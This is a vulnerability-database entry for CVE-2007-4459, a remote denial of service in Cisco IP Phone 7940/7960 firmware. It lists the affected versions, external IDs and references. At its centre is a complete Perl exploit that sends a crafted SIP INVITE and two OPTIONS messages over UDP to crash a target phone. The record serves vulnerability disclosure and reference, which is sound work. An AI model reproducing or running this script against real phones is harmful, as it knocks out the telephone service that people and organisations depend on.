ID
VAR-E-200708-0246
CVE
cve_id: | CVE-2007-4459 | Trust: 1.3 |
EDB ID
4297
TITLE
Cisco IP Phone 7940 - 3 SIP Messages Remote Denial of Service - Hardware dos Exploit
Trust: 0.6
DESCRIPTION
Cisco IP Phone 7940 - 3 SIP Messages Remote Denial of Service. CVE-2007-4459 . dos exploit for Hardware platform
Trust: 0.6
AFFECTED PRODUCTS
vendor: | cisco | model: | ip phone | scope: | eq | version: | 7940 | Trust: 1.0 |
vendor: | cisco | model: | voip phone cp-7960 | scope: | eq | version: | 3.2 | Trust: 0.3 |
vendor: | cisco | model: | voip phone cp-7960 | scope: | eq | version: | 3.1 | Trust: 0.3 |
vendor: | cisco | model: | voip phone cp-7960 | scope: | eq | version: | 3.0 | Trust: 0.3 |
vendor: | cisco | model: | voip phone cp-7960 | scope: | eq | version: | 8.6(0) | Trust: 0.3 |
vendor: | cisco | model: | voip phone cp-7940 | scope: | eq | version: | 3.2 | Trust: 0.3 |
vendor: | cisco | model: | voip phone cp-7940 | scope: | eq | version: | 3.1 | Trust: 0.3 |
vendor: | cisco | model: | voip phone cp-7940 | scope: | eq | version: | 3.0 | Trust: 0.3 |
vendor: | cisco | model: | voip phone cp-7940 | scope: | eq | version: | 8.6(0) | Trust: 0.3 |
vendor: | cisco | model: | voip phone cp-7960 | scope: | ne | version: | 8.7(0) | Trust: 0.3 |
vendor: | cisco | model: | voip phone cp-7940 | scope: | ne | version: | 8.7(0) | Trust: 0.3 |
EXPLOIT
#!/usr/bin/perl
use IO::Socket::INET;
die "Usage $0 <dst> <port> <username>" unless ($ARGV[2]);
$socket=new IO::Socket::INET->new(PeerPort=>$ARGV[1],
Proto=>'udp',
PeerAddr=>$ARGV[0]);
$msg = "INVITE sip:$ARGV[2]\@$ARGV[0] SIP/2.0\r\nVia: SIP/2.0/UDP\t192.168.1.2;rport;branch=00\r\nFrom: <sip:gasparin\@192.168.1.2>;tag=00\r\nTo: <sip:$ARGV[2]\@$ARGV[0]>;tag=00\r\nCall-ID: et\@192.168.1.2\r\nCSeq: 10 INVITE\r\nContent-Length: 0\r\n\r\n";;
$socket->send($msg);
sleep(1);
$msg ="OPTIONS sip:$ARGV[2]\@$ARGV[0] SIP/2.0\r\nVia: SIP/2.0/UDP 192.168.1.2;rport;branch=01\r\nFrom: <sip:gasparin\@192.168.1.2>;tag=01\r\nTo: <sip:$ARGV[2]\@$ARGV[0]>\r\nCall-ID: et\@192.168.1.2\r\nCSeq: 11 OPTIONS\r\nContent-Length: 0\r\n\r\n";
$socket->send($msg);
sleep(1);
$msg ="OPTIONS sip:$ARGV[2]\@$ARGV[0] SIP/2.0\r\nVia: SIP/2.0/UDP 192.168.1.2;rport;branch=02\r\nFrom: <sip:gasparin\@192.168.1.2>;tag=02\r\nTo: <sip:$ARGV[2]\@$ARGV[0]>\r\nCall-ID: et\@192.168.1.2\r\nCSeq: 12 OPTIONS\r\nContent-Length: 0\r\n\r\n";
$socket->send($msg);
# milw0rm.com [2007-08-21]
Trust: 1.0
EXPLOIT LANGUAGE
pl
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
3 SIP Messages Remote Denial of Service
Trust: 1.0
CREDITS
MADYNES
Trust: 0.6
EXTERNAL IDS
db: | EXPLOIT-DB | id: | 4297 | Trust: 1.6 |
db: | NVD | id: | CVE-2007-4459 | Trust: 1.3 |
db: | EDBNET | id: | 28617 | Trust: 0.6 |
db: | BID | id: | 25378 | Trust: 0.3 |
REFERENCES
url: | https://nvd.nist.gov/vuln/detail/cve-2007-4459 | Trust: 1.0 |
url: | https://www.exploit-db.com/exploits/4297/ | Trust: 0.6 |
url: | http://www.cisco.com/en/us/products/products_security_response09186a00808a6693.html | Trust: 0.3 |
url: | http://www.cisco.com/en/us/products/hw/phones/ps379/index.html | Trust: 0.3 |
SOURCES
db: | BID | id: | 25378 |
db: | EXPLOIT-DB | id: | 4297 |
db: | EDBNET | id: | 28617 |
LAST UPDATE DATE
2022-07-27T09:17:11.644000+00:00
SOURCES UPDATE DATE
db: | BID | id: | 25378 | date: | 2015-04-16T18:09:00 |
SOURCES RELEASE DATE
db: | BID | id: | 25378 | date: | 2007-08-20T00:00:00 |
db: | EXPLOIT-DB | id: | 4297 | date: | 2007-08-21T00:00:00 |
db: | EDBNET | id: | 28617 | date: | 2007-08-21T00:00:00 |